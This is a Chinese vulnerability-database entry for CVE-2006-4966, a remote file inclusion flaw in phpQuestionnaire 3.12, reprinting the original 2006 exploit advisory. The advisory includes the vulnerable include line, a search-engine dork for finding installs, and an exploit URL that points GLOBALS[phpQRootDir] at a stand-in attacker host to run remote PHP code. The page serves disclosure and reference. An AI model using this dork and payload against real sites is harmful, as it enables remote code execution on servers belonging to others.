chumpsoft phpQuestionnaire 'inc/ifunctions.php'PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111104 漏洞类型 输入验证
发布时间 2006-09-21 更新时间 2006-09-28
CVE编号 CVE-2006-4966 CNNVD-ID CNNVD-200609-419
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2410
https://cxsecurity.com/issue/WLB-2006090157
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-419
|漏洞详情
chumpsoftphpQuestionnaire(phpQ)3.12的inc/ifunctions.php中存在PHP远程文件包含漏洞,远程攻击者可以通过GLOBALS[phpQRootDir]参数中的URL执行任意PHP代码。
|漏洞EXP
#############################SolpotCrew Community################################
#
#  phpQuestionnaire 3.12 (GLOBALS[phpQRootDir]) Remote File Inclusion
#
#  vendor : http://www.chumpsoft.com/products/phpq/
#
#################################################################################
#
#
#       Bug Found By :Solpot a.k.a (k. Hasibuan) (21-09-2006)
#
#       contact: chris_hasibuan@yahoo.com
#
#       Website : http://www.nyubicrew.org/adv/solpot-adv-08.txt
#
################################################################################
#
#
#      Greetz: choi , h4ntu , Ibnusina , r4dja , No-profile , begu , madkid
#              robby , Matdhule , setiawan , m3lky , NpR , Fungky , barbarosa
#              home_edition2001 , Rendy , cow_1seng , ^^KaBRuTz , bYu , Lappet-homo
#              Blue|spy , cah|gemblung , Slacky , blind_boy , camagenta , XdikaX
#              x-ace , Dalmet , th3sn0wbr4in , iFX , ^YoGa^
#              and all member solpotcrew community
#              especially thx to str0ke @ milw0rm.com
#
###############################################################################
Input passed to the "GLOBALS[phpQRootDir]" is not properly verified
before being used to include files. This can be exploited to execute
arbitrary PHP code by including files from local or external resources.

code from inc/ifunctions.php

################################################################################
# phpQuestionnaire                           Version 3.12                      #
# Copyright 2003-2006 chumpsoft, inc.        August 7, 2006                    #
# http://www.chumpsoft.com/products/phpq/    support@chumpsoft.com             #
################################################################################
# Use of this program constitutes your agreement to the terms contained in the #
# LICENSE file within this distribution.                                       #
################################################################################

include($GLOBALS["phpQRootDir"] . "inc/tableformat.php");

function ImportSurvey ($fp, $type, $flag) {
       set_time_limit(600);  # Attempt to disable time limit in case upgrade takes long


google dork : "phpQuestionnaire v3"

exploit : http://somehost/path_to_phpQuestionnaire/inc/ifunctions.php?GLOBALS[phpQRootDir]=http://evil

##############################MY LOVE JUST FOR U RIE#########################
######################################E.O.F##################################

# milw0rm.com [2006-09-21]
|参考资料

来源:XF
名称:phpquestionnaire-ifunctions-file-include(29081)
链接:http://xforce.iss.net/xforce/xfdb/29081
来源:BID
名称:20142
链接:http://www.securityfocus.com/bid/20142
来源:BUGTRAQ
名称:20060921SolpotCrewAdvisory#12-phpQuestionnaire3.12(GLOBALS[phpQRootDir])RemoteFileInclusion
链接:http://www.securityfocus.com/archive/1/archive/1/446748/100/0/threaded
来源:MISC
链接:http://www.nyubicrew.org/adv/solpot-adv-08.txt
来源:MILW0RM
名称:2410
链接:http://www.milw0rm.com/exploits/2410
来源:SECUNIA
名称:22042
链接:http://secunia.com/advisories/22042
来源:SREASON
名称:1630
链接:http://securityreason.com/securityalert/1630
来源:MILW0RM
名称:2410
链接:http://milw0rm.com/exploits/2410